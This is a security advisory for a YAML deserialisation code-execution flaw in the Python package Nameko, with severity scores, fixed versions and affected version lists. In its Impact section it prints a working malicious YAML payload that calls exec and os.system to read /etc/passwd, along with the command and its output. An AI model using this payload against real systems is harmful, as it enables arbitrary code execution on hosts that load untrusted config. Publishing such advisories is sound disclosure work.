GHSA-6p52-jr3q-c94g

Suggest an improvement
Source
https://github.com/advisories/GHSA-6p52-jr3q-c94g
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/10/GHSA-6p52-jr3q-c94g/GHSA-6p52-jr3q-c94g.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-6p52-jr3q-c94g
Aliases
Published
2021-10-19T15:28:57Z
Modified
2024-10-07T15:01:15.356005Z
Severity
  • 8.6 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H CVSS Calculator
  • 9.3 (Critical) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H CVSS Calculator
Summary
Nameko Arbitrary code execution due to YAML deserialization
Details

Impact

Nameko can be tricked to perform arbitrary code execution when deserialising a YAML config file. Example:

# malicious.yaml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
$ nameko run --config malicious.yaml test
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
... 

Patches

The problem was fixed in https://github.com/nameko/nameko/pull/722 and released in version 2.14.0, and in rc10 of the v3 pre-release.

Versions prior to 2.14.0, and v3.0.0rc0 through v3.0.0rc9 are still vulnerable.

Workarounds

The vulnerability is exploited by config files with malicious content. It can be avoided by only using config files that you trust.

Database specific
{
    "nvd_published_at": "2021-10-26T13:15:00Z",
    "cwe_ids": [
        "CWE-502"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2021-10-19T15:14:24Z"
}
References

Affected packages

PyPI / nameko

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.14.0

Affected versions

0.*

0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.1.7
0.1.8
0.1.9
0.2.0
0.2.1
0.3.0
0.4.0
0.4.1
0.5.0
0.5.1
0.5.2
0.5.3
0.6.0
0.7.0

1.*

1.0.0
1.0.1
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0
1.2.1
1.2.2
1.2.3
1.2.4
1.2.5
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.3.5
1.4.0
1.4.1
1.5.0
1.6.0
1.6.1
1.7.0
1.7.1
1.7.2
1.8.0
1.8.1
1.8.2
1.9.0
1.9.1
1.10.0
1.10.1
1.11.0
1.11.1
1.11.2
1.11.3
1.11.4
1.11.5
1.12.0
1.13.0
1.14.0

2.*

2.0.0
2.1.0
2.1.1
2.1.2
2.2.0
2.3.0
2.3.1
2.4.0
2.4.1
2.4.2
2.4.3
2.4.4
2.5.0
2.5.1
2.5.2
2.5.3
2.5.4
2.6.0
2.7.0
2.8.0
2.8.1
2.8.2
2.8.3
2.8.4
2.8.5
2.9.0rc0
2.9.0
2.9.1rc0
2.9.1
2.10.0
2.11.0
2.12.0
2.13.0

PyPI / nameko

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
3.0.0rc0
Fixed
3.0.0rc10

Affected versions

3.*

3.0.0rc0
3.0.0rc1
3.0.0rc2
3.0.0rc3
3.0.0rc4
3.0.0rc5
3.0.0rc6
3.0.0rc7
3.0.0rc8
3.0.0rc9

Database specific

{
    "last_known_affected_version_range": "<= 3.0.0rc9"
}